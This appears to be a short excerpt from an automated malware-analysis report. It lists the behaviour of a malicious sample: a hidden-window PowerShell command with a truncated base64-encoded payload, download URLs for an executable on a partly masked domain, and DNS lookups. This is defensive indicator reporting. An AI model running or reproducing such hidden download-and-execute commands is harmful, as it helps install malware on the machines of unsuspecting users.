Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAuACAAKAAgACQAUABzAEgAbwBNAEUAWwA0AF0AKwAkAFAAcwBoAG8ATQBlAFsAMwA0AF0AKwAnAFgAJwApACAAKAAgACgAKAAoACIAewAzADIAfQB7ADEANgB9AHsANQA5AH0AewA2ADUAfQB7ADUAfQB7ADcANQB9AHsANA...
- 'pe##igon.hu':80
- http://pe##igon.hu/zji.exe
- http://www.pe##igon.hu/zji.exe
- DNS ASK pe##igon.hu
- DNS ASK va###im9.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAuACAAKAAgACQAUABzAEgAbwBNAEUAWwA0AF0AKwAkAFAAcwBoAG8ATQBlAFsAMwA0AF0AKwAnAFgAJwApACAAKAAgACgAKAAoACIAewAzADIAfQB7ADEANgB9AHsANQA5AH0AewA2ADUAfQB7ADUAfQB7ADcANQB9AHsANA...' (with hidden window)